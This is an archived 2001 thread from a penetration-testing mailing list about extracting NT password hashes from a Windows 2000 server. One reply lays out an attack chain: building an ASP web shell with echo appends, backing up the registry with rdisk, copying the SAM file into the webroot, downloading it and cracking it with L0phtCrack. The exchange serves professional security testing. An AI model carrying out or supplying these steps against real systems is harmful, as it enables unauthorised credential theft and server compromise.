Re: Extracting NT password hashes from registry export file

From: Joe Brown (joe_brown@senet-int.com)
Date: 11/02/01 

Message-ID: <000401c163e0$12138da0$3c05a8c0@senetelite>
From: "Joe Brown" <joe_brown@senet-int.com>
To: <pmawson@deloitte.co.nz>, <pen-test@securityfocus.com>
Subject: Re: Extracting NT password hashes from registry export file
Date: Fri, 2 Nov 2001 15:50:56 -0500

The problem I've come across with this is that since the IUSR_machinename
account is the anonymous web user, I don't have permissions to copy
c:\winnt\repair\sam._ c:\inetpub\wwwroot\sam._ Any ideas???

Joe

----- Original Message -----
From: <pmawson@deloitte.co.nz>
To: <pen-test@securityfocus.com>
Sent: Wednesday, October 31, 2001 4:23 PM
Subject: RE: Extracting NT password hashes from registry export file

> David
>
> One problem you have is even administrator doesn't have access to the sam
> and security hives in the registry.
> Only the system account has access to these.
> As a result it is unlikely that the registry export contains these hives.
> There may be passwords cached in other areas, I don't know, someone else
may
> be able to answer that one.
>
> If you can run regedit /e then you should be able to run
> echo "I am the first line of cmdasp.asp" >>cmdasp.asp
>
> Use this technique to get cmdasp.asp up to the server.
>
> You can then use cmdasp.asp to run rdisk /s- (back up the registry to the
> repair directory)
> Run copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\sam._
> Use your browser to download the file http://www.taget.com/sam._
> Run it through lophtcrack and you're done.
>
>
> Phill
>
>
> -----Original Message-----
> From: David Watson [mailto:david.watson@ioko365.com]
> Sent: Thursday, 1 November 2001 4:59 a.m.
> To: pen-test@securityfocus.com
> Subject: Extracting NT password hashes from registry export file
>
>
> Hi,
>
> Hopefully someone will have come across this problem before and will be
> able to offer some advice to save me some unnecessary pain. I`m trying to
> find a method to quickly and easily extract the NT password hashes from a
> registry export text file (ie regedit /e reg.txt) of a Win2K server.
>
> I have no file upload capability to the server in question, so I cannot
use
> interactive methods such as pwdump/samdump to export the NT password
hashes
> from memory (or pwdump3 with DLL injection for syskey protected hashes).
> However, I have been able to export a copy of registry as local
> administrator and download this data locally. Short of opening the ASCII
> export in a hex editor, locating the correct password hash starting
off-set
> location in [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]
and
> manually extracting the first 16 bytes for the LMHash and the next 16
bytes
> for the NTHash from the "V"=hex: record for each account (which will be
> skeyed on further obfuscated via DES encryption with the user's RID as the
> key I believe), I can`t find any tool or current technique to do this more
> easily.
>
> Has anyone ever tried to do this before, or come across/written a tool
> capable of reading an entire export file and extracting all the necessary
> data? Is there a better way to approach this problem that I might have
> missed? The source code for pwdump has a method to handle the
> de-obfuscation of the hashes but i`m surprised that I cannot find any
> previous papers or tools that attempt this process.
>
> As an aside, in the past on NT4 I would have updated the Windows repair
> directory using rdisk and extracted the hashes from the SAM. This only
> appears to be possible now in Win2K and above when using the GUI as
command
> line rdisk support was apparently dropped recently (MS Q231777). Has
anyone
> found a method of up refreshing the repair directory from the command line
> in Win2K yet?
>
> Any advice appreciated, i`m happy to summarise my findings and post them
> here for others.
>
> Thanks,
>
> David
>
>
>
> --
> David Watson Voice: +44 1904 438000
> Technical Manager Fax: +44 1904 435450
> ioko365 Email: david.watson@ioko365.com
>
>
> -------------------------------------------------------------------------- 

--
> This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please
see:
> https://alerts.securityfocus.com/
>
> ************************************************************
> CAUTION:  This e-mail and any attachment(s) contains
> information that is both confidential and possibly legally
> privileged.  No reader may make any use of its content
> unless that use is approved by Deloitte separately in writing.
> Any opinion, advice or information contained in this e-mail
> and any attachment(s) is to be treated as interim and
> provisional only and for the strictly limited purpose of the
> recipient as communicated to us.  Neither the recipient nor
> any other person should act upon it without our separate
> written authorisation of reliance.
> If you have received this message in error please notify us
> immediately and destroy this message.  Thank you.
> Deloitte Touche Tohmatsu
> Internet: www.deloitte.co.nz
> ************************************************************
>
> --------------------------------------------------------------------------
--
> This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please
see:
> https://alerts.securityfocus.com/

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Relevant Pages